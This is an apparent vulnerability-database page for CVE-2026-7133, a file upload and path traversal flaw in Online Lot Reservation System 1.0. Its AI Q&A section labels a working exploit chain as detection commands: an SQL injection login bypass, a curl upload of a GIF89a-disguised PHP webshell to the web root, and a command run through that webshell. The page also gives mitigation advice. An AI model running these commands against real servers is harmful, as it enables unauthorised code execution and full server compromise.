CVE-2026-7133
Unrestricted File Upload in Online Lot Reservation System /activity.php
Publication date: 2026-04-27
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| code-projects | online_lot_reservation_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-434 | The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. |
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The CVE-2026-7133 vulnerability affects the Online Lot Reservation System version 1.0, specifically in the file activity.php.
It involves a combination of arbitrary file upload and path traversal vulnerabilities that allow remote code execution without requiring administrator privileges.
The vulnerability arises because the directory parameter is directly concatenated to the upload path without sanitization, enabling path traversal via ../ sequences.
Additionally, file type detection is bypassed by using getimagesize(), which can be tricked by prepending GIF89a magic bytes to malicious files.
Attackers can upload malicious PHP files to arbitrary directories, including the web root, and execute arbitrary system commands remotely, potentially gaining full server control.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows unauthenticated remote attackers to upload and execute arbitrary PHP code on the server, leading to full server compromise.
Such a compromise can result in unauthorized access to sensitive data, potential data breaches, and loss of data integrity and availability.
Consequently, this vulnerability could negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
Organizations using the affected system may face increased risk of non-compliance due to potential exposure of protected data and failure to maintain adequate security controls.
How can this vulnerability impact me? :
This vulnerability allows unauthenticated attackers to upload and execute arbitrary PHP code on the server.
By exploiting the vulnerability, attackers can execute arbitrary system commands remotely, leading to full server compromise.
This means attackers can gain control over the server, potentially accessing sensitive data, modifying or deleting files, and disrupting services.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to exploit the arbitrary file upload and path traversal in the activity.php file of the Online Lot Reservation System 1.0. Detection involves checking if the system allows uploading files with manipulated directory parameters and if uploaded files can be executed remotely.
Example commands to detect the vulnerability include:
- Use a curl command to attempt SQL injection login to obtain an admin session cookie: curl -X POST http://127.0.0.1:7777/onlinelot/loginuser.php -d "email=admin' OR '1'='1'-- -&password=test" -c cookies.txt
- Create a malicious PHP webshell file prepended with GIF89a header to bypass file type checks.
- Upload the webshell using curl with a path traversal directory parameter: curl -X POST http://127.0.0.1:7777/onlinelot/activity.php -F "[email protected]" -F "directory=../" -F "date=2024-01-01" -F "id=1" -b cookies.txt
- Attempt to execute commands remotely via the uploaded webshell: curl "http://127.0.0.1:7777/onlinelot/shell.php?cmd=whoami"
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing strict validation and sanitization of the directory parameter used in file uploads to prevent path traversal.
- Allow only predefined directories for uploads, for example by checking if the directory parameter matches an allowed list.
- Remove any '../' sequences from the directory parameter and verify that the resolved real path is within the intended base upload directory.
- Enforce strict file type validation by allowing only specific image extensions such as jpg, jpeg, gif, and png.
- Verify MIME types using functions like finfo_file() to ensure uploaded files are legitimate images.
- Rename uploaded files to unique filenames instead of keeping original names to avoid overwriting and predictable file paths.
- Configure the server to prohibit execution of PHP files in upload directories to prevent remote code execution.